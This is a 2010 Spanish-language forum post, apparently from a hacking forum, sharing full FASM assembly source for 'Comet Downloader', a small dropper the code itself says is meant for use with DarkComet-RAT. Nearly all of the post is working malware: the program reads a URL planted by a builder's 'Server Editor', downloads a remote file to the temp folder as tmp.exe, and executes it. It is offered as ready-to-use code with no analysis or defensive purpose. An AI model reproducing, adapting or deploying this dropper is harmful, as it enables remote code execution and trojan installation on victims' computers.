CometDownloader (ASM)

Administrador

Mensajes : 1000 Reputación : 142
Registrado : 11/08/2010
Localización : Nicaragua

Mar Nov 16, 2010 7:59 pm

Linkgl escribió:Es un downloader con puras Apis que almacena los datos en un RES

Código:: ;-----------------------------------; ; Comet Downloader [FASM] -; ; Author : DarkCoderSc -; ; Mail : [Tienes que estar registrado y conectado para ver este vínculo] -; ;----------------------------------------------------------------------; ; Size = 2048o (2ko) -; ; Server Editor include it will read the ressource %URL% in RT_RCDATA -; ; This sample example will be use on DarkComet-RAT ! -; ;----------------------------------------------------------------------; Format PE GUI 4.0 entry start include 'c:\FASMW168\include\win32a.inc' ;Var data section rw------------------------------------- section '.data' data readable writeable ;Const Values-------------------- CMD_OPEN db 'open',0 filep db 'tmp.exe',0 ;Unknow values------------------- handle dd ? hRes dd ? hReturn dd ? sRes dd ? pRes dd ? Res db ? SzBuf dd ? ;Server Editor Values------------ RC_STR0 db '%URL%',0 TmpDir rb 256d ;-------------- url db ? path db ? ;Code section-------------------------------------------- section '.code' code readable executable ;Entry point--------------------------------------------- start: invoke GetModuleHandle,0 mov [handle],eax ;Server Settings n1--------------------------------- invoke FindResource,NULL,RC_STR0,RT_RCDATA mov [hRes],eax invoke LoadResource,NULL,[hRes] mov [hReturn],eax invoke SizeofResource,NULL,[hRes] mov [sRes],eax invoke LockResource,[hReturn] mov [pRes],eax invoke movememory,url,[pRes],[sRes] invoke FreeResource,[hReturn] xor eax, eax ;Finally call the download process------------------ invoke GetTempPath,TmpDir,TmpDir ;Create The Final Path------------------------------ invoke strcat,TmpDir,filep ;Now Download--------------------------------------- invoke DeleteFile,TmpDir invoke URLDownloadToFile,0,url,TmpDir,0,NULL invoke ShellExecute,0,CMD_OPEN,TmpDir,0,0,SW_SHOW exit: invoke ExitProcess,0 ;Import data section------------------------------------- section '.idata' import data readable ;Dll names------------------------------- library urlmon,'URLMON.DLL',\ Shell32,'SHELL32.DLL',\ Kernel32,'KERNEL32.DLL',\ User32,'USER32.DLL' import urlmon,\ URLDownloadToFile,'URLDownloadToFileA' import Shell32,\ ShellExecute,'ShellExecuteA' import Kernel32,\ GetModuleHandle,'GetModuleHandleA',\ FindResource,'FindResourceA',\ LoadResource,'LoadResource',\ SizeofResource,'SizeofResource',\ LockResource,'LockResource',\ lstrcpy,'lstrcpy',\ ExitProcess,'ExitProcess',\ movememory,'RtlMoveMemory',\ FreeResource,'FreeResource',\ ZeroMemory,'RtlZeroMemory',\ strcat,'lstrcat',\ GetTempPath,'GetTempPathA',\ DeleteFile,'DeleteFileA' import User32,\ MessageBox,'MessageBoxA'

1-Slandg-